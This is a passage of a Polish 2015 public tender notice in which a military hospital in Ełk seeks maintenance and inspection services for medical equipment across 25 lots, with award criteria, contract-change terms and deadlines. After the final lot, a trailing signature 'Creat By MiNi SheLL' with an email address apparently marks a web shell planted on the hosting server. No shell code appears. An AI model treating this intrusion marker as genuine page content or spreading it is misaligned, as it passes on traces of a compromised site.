<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga, aby Wykonawca posiadał zaświadczenie wystawione przez producenta sprzętu medycznego potwierdzające, że zleceniobiorca jest autoryzowaną firmą lub dysponuje pracownikami, którzy są uprawnieni do obsługi   serwisowej , dokonywania przeglądów i konserwacji aparatury/sprzętu medycznego oraz posiadał na ten fakt potwierdzenie producenta wystawione nie wcześniej niż 5 lat przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający w związku z art. 144 ustawy Pzp dopuszcza zmiany treści umowy w stosunku do złożonej oferty przetargowej w n/w przypadkach Strony dopuszczają zmiany w umowie w zakresie:
-	zmiany wartości brutto określonej w § 4 ust. 1 w przypadku zmiany obowiązującej stawki VAT - od daty wejścia w życie stosownych przepisów prawa;
-	obniżenia wartości określonej w § 4 ust. 1 umowy w przypadku obniżenia ceny przedmiotu umowy lub cen jednostkowych poszczególnych prac przez Wykonawcę  zmniejszenia zakresu usługi w okresie obowiązywania umowy.
-	ilości i rodzaju urządzeń/sprzętu medycznego wymienionego w Załączniku nr 2 do SIWZ.
-	zmiany wynikające z nowelizacji przepisów prawa;
2.	Powyższe zmiany nie mogą skutkować zwiększeniem ogólnej wartości umowy.
3.	Wszystkie zmiany postanowień umowy mogą nastąpić wyłącznie w formie pisemnej (aneks), za zgodą stron pod rygorem nieważności.
4.	Z zastrzeżeniem ust. 1 umowy zakazuje się zmian postanowień umowy oraz wprowadzania do umowy nowych postanowień, które są niekorzystne dla, Zamawiającego, a także istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 4 Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2015 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylizator parowy
Sterylizator parowy
Sterylizator parowy
Sterylizator parowy
Myjnia-dezynfektor
Myjnia-dezynfektor
Myjnia-dezynfektor
Myjnia-dezynfektor
Myjnia dezynfektor
Myjnia dezynfektor
Myjnia dezynfektor
Myjnia ultradźwiękowa 2-komorowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparaty do znieczulania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadania nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Respiratory stacjonarne, Respirator transportowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Defibrylatory.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stół operacyjny laryngologiczny
Stół operacyjny uniwersalny
Stół operacyjny urologiczno-ortopedyczny
Stół operacyjny uniwersalny
Lampa operacyjna sufitowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do kriochirurgii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Videoartroskop operacyjny
Videolaparoskop operacyjny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Diatermia chirurgiczna
Diatermia chirurgiczna
Diatermia chirurgiczna z przystawką argonową
Diatermia chirurgiczna
Diatermia chirugiczna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> EKG.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ssak jezdny próżniowy  2-butlowy
Ssak jezdny próżniowy 2-butlowy
Ssak jezdny próżniowy 2-butlowy
Ssak jezdny próżniowy 2-butlowy
Ssak operac.elektr.Itkavac V 40
Ssak operac.elektr.Itkavac V 40
Ssak operac.elektr.Itkavac V 40
Ssak operac.elektr.Itkavac V 40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Respiratory.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łóżka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizatory.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizatory.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analizator.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wirówka laborat. t. 350e MPW
Wirówka laborat. t. 350e MPW
Wirówka laborat. MPW-351e
Wirówka laborat. MPW-341
Wirówka mikrohematokrytowa t. 316.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kardiomonitor - 6 szt
2	Kardiomonitor - 4 szt
3	Kardiomonitor - 3 szt
4	Monitor funkcji zyciowych - 2 szt.
5	Monitor funkcji zyciowych - 3 szt.
6	System monitorowania pacjenta (centrala + 4 kardiomonitory) - 2 szt.
7	System monitorowania pacjenta (centrala + 8 kardiomonitorów) - 1 szt.
8	System monitorowania pacjenta (centrala + 5 kardiomonitorów) - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Laser do fotokoagulacji i fotodysrupcji - 1 szt
Polomierz-perymetr komputerowy - 1 szt
Funduskamera - 1 szt
Podgląd asystencki stereo - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tonometr ATP z pachymetrem - 1 szt.
Tonometr -Tomograf speckralny - 1 szt.
Mikroskop okulistyczny - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cheroskop-koordymator - 1 szt.
Eutyskop Cuppers - 1 szt.
Polomierz z zestawem komputerowym - 1 szt.
Visuscop - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Autokeratorefraktometr - 1 szt.
Fakoemulsyfikator - 1 szt.
USG okulistyczne - 1 szt.
Aparat Usg okulistyczny - 1 szt.
Autorefraktometr - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Myjnia do endoskopów - 1 szt.
Ssak elektryczny do endoskopu -  2 szt.
Tor wizyjny do endoskopii - 1 szt.
Videoprocesor - 1 szt.
Źródło zimnego światła - 1 szt.
Videogastroskop - 1 szt.
Videogastroskop - 1 szt.
Videokolonoskop - 1 szt.
Videobronchoskop 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Videoduodenoskop z zestawem operacyjnym do ECPW
Videogastroskop
Pompa
Procesor obrazu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inhalator tlenowy - 10 kpl.
Aparat do diatermii - 19 kpl.
Pompa infuzyjna strzykawkowa - 7 kpl.
Defibrylator przenośny - 5 kpl.
Mikroskop - 1 kpl.
Zestaw LC - cieplarka - 3 kpl.
Zestaw LL-lodowka - 1 kpl.
Zestaw LS - suszarka - 3 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Czas realizacji przeglądu w dniach roboczych - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com